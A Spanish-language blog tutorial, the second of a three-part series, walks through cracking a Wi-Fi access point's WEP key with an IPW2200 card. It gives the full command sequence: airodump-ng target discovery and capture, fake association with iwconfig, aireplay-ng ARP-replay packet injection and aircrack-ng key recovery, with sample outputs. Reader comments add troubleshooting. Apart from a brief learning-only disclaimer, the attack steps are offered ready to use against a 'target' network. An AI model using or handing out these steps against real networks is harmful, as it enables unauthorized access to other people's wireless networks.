WEP Cracking con IPW2200
En el artículo anterior compilamos e instalamos el módulo controlador de la tarjeta de red inalámbrica IPW2200 que nos habilitó dos nuevas interfaces de red, las que usaremos para intentar descifrar la clave WEP de un Access Point, procedimiento al que se le conoce como WEP Cracking.Este es el segundo de 3 artículos relacionados con el WEP Cracking usando una tarjeta Intel Pro/Wireless 2200.
Relación de Artículos:
- Parte 1: IPW2200 con soporte para Inyección.
- Parte 2: WEP Cracking.
- Parte 3: 2Wire Hacking y Monitoreo de Red.
Nota: No me considero un experto en la materia y tampoco pretendo que nadie use lo aquí explicado para fines diferentes al aprendizaje. Apliquemos una sencillo pero profundo consejo; "Mi libertad termina donde empieza la libertad de los demás" y seamos responsables de nuestros conocimientos.
Como nota adicional advierto que lo que a continuación escribo, no es una "receta rápida" para el WEP Cracking, la idea es aprender cómo y por qué funciona cada cosa.
Para este procedimiento estoy usando GNU/Linux Debian en su rama inestable, usando un kernel. 2.6.22.
Instalar aircrack-ng
aircrack-ng es un conjunto de herramientas con las que nos será posible realizar varias tareas, desde detectar redes, hasta inyectar paquetes. En Debian es muy fácil tenerlo:apt-get install aircrack-ng
Algunas de las herramientas que contiene la suite, son las siguientes:
| Nombre | Descripción |
|---|---|
| aircrack-ng | Descifra claves WEP y WPA de paquetes capturados por medio de airodump-ng |
| airdecap-ng | Desencripta paquetes capturados por medio de una clave dada. |
| airmon-ng | Habilita el modo "monitor" en interfaces de red inalámbricas que lo soporten. |
| aireplay-ng | Su función primaria es la de generar trafico por medio de la inyección de paquetes, contiene 10 tipos de ataques diferentes |
| airodump-ng | Captura paquetes de datos |
| airtun-ng | Crea túneles de interfaces virtuales (importante para el IPW2200) |
Identificar Objetivo
Lo primero que tenemos que hacer es identificar nuestro objetivo y adquirir toda la información que podamos para continuar. Vamos a usarairodump-ng, la herramienta de la suite encargada de la captura de paquetes.airodump-ng rtap0
Debemos tener en cuenta que
rtap0 es en realidad nuestra interfase en modo "monitor". De esta forma veremos en la parte superior de la pantalla algo parecido a esto:BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:1A:2B:3C:4D:5E 200 3 0 0 1 54. WEP WEP APTARGET
De donde podemos adquirir mucha información sobre los Access Point cercanos a nosotros.
- BSSID: MAC Address del Access Point
- PWR: Nivel de la señal, entre más alto mas cercano a nosotros
- #Data: Número de paquetes de datos capturados, equivale al número de IVs
- CH: Canal desde donde esta transmitiendo
- ENC: Tipo de encriptación del AP
- ESSID: Nombre de difusión del que hace uso el AP
La información básica que necesitamos para dar el siguiente paso es el ESSID, el BSSID y el canal.
Asociación al Access Point
El siguiente paso es asociarnos al AP, esto significa que el AP nos permita generar trafico en su red, estemos o no estemos formados de forma adecuada, para ello vamos a usar los datos mencionados antes y trataremos de crear una asociación:iwconfig eth1 essid "APTARGET" key 1111111111 channel 1
Como podemos observar, la "key" no es la correcta, usamos una cualquiera para intentar asociarnos al AP. Después tenemos que verificar que ya estemos asociados, para lo cual hacemos:
iwconfig eth1
Lo que nos dará información parecida a la siguiente:
eth1 IEEE 802.11g ESSID:"APTARGET"
Mode:Managed Frequency:2.417 GHz Access Point: 00:1A:2B:3C:4D:5E
Bit Rate:54 Mb/s Tx-Power=20 dBm Sensitivity=8/0
Retry limit:7 RTS thr:off Fragment thr:off
Encryption key:1111-1111-11 Security mode:open
Power Management:off
Link Quality=64/100 Signal level=-62 dBm Noise level=-85 dBm
Rx invalid nwid:0 Rx invalid crypt:110 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:18
Si estamos correctamente asociados se vera el MAC del AP en "
Access Point: 00:1A:2B:3C:4D:5E". Es importante recalcar que es muy importante revisar que estemos asociados adecuadamente.Captura e Inyección de paquetes
En este momento ya podemos empezar a capturar paquetes generados en la red del AP objetivo, y es tan simple como ejecutar:airodump-ng --bssid 00:1A:2B:3C:4D:5E --channel 1 --write wep rtap0
Se le indica a
airodump-ng que capture todos los paquetes que pueda a un archivo "wep-nn.cap".Para determinar si la red tiene suficiente tráfico interno, podemos ver como crece la columna "
#Data" que contiene los IV's (vectores de inicialización) que son necesarios para el crackeo de una clave WEP. Generalmente se necesita un mínimo de 250,000 IV's.Como podremos ver, la captura de datos es un proceso lento, y si la red objetivo tiene poco tráfico la espera será muy larga. Para acelerar el procedimiento podemos ocupar la técnica de Inyección de Paquetes, que es una forma de generar trafico en redes sin nodos o con poco tráfico.
aireplay-ng -3 -b 00:1A:2B:3C:4D:5E -h 00:11:22:33:44:55 -x 1024 -g 1000000 -i rtap0 eth1
Ahora hicimos uso de
aireplay-ng en un ataque conocido como "Reinyección de una petición ARP (ARP-request)". Este ataque escribirá los paquetes capturados en un archivo "replay_arp-nnnn-nnnnnn.cap", muy parecido al generado por airodump-ng. Si todo sale bien, veremos como la columna "#Data" crece de forma considerable en muy poco tiempo.Descifrar clave WEP
Mientras se sigue capturando e inyectando, y al llegar a nuestro número mínimo de 250,000 IV's en "#Data", podemos empezar a probar si ya podemos descifrar la clave WEP. Ahora debemos tener 2 arhivos, uno que fué creado porairodump-ng llamado "wep-nn.cap" y el otro creador por aireplay-ng llamado "replay_arp-nnnn-nnnnnn.cap". Solo es necesario ejecutar lo siguiente:aircrack-ng replay_arp-nnnn-nnnnnn.cap
aircrack-ng es quien se encarga de tratar de desencriptar la clave WEP, basado en los paquetes capturados. Se puede hacer lo mismo con el archivo "wep-nn.cap" y si todo funciona según lo esperado, deberíamos de obtener una respuesta parecida a la siguiente:KEY FOUND! [ 12:34:56:78:90 ] Decrypted correctly: 100%
Ahora ya que tenemos la clave WEP de nuestro objetivo, solo es necesario asociarnos de forma adecuada al AP y pediremos que se nos asigne una IP dentro de la RED... Pero eso lo veremos en la siguiente entrega.
 |
Hola, Respecto al comentario anterior, fíjate que tienes la tarjeta en modo monitor. Creo que para poder asociarte debes poner la tarjeta en modo managed: airmon-ng stop eth1 o iwconfig mode managed eth1 saludos. |
|
|
Excelente articulo y excelente frase, "mi libertad termina donde empieza la de los demas" Saludos! |
no me marca ningun error pero no me asocia el APTARGET me doy cuenta porque vuelvo a teclear iwconfig ath0 y me aparece lo siguiente
ath0 IEEE 802.11g ESSID:"laboratorio" Nickname:"" Mode:Monitor Frequency:2.422 GHz Access Point: Not-Associated Bit Rate:0 kb/s Tx-Power:14 dBm Sensitivity=1/1 Retry:off RTS thr:off Fragment thr:off Encryption key:1111-1111-11 Security mode:restricted Power Management:off Link Quality=0/70 Signal level=-34 dBm Noise level=-34 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0y si vuelvo a teclear el comando iwconfig para volver a asociarlo, lo que hace la tarjeta es asociarse ella misma, me doy cuenta por la MAC que toma..
mil gracias por tu ayuda
te dejo mi correo por si me pudieras atender
jcarlos27 at gmail dot com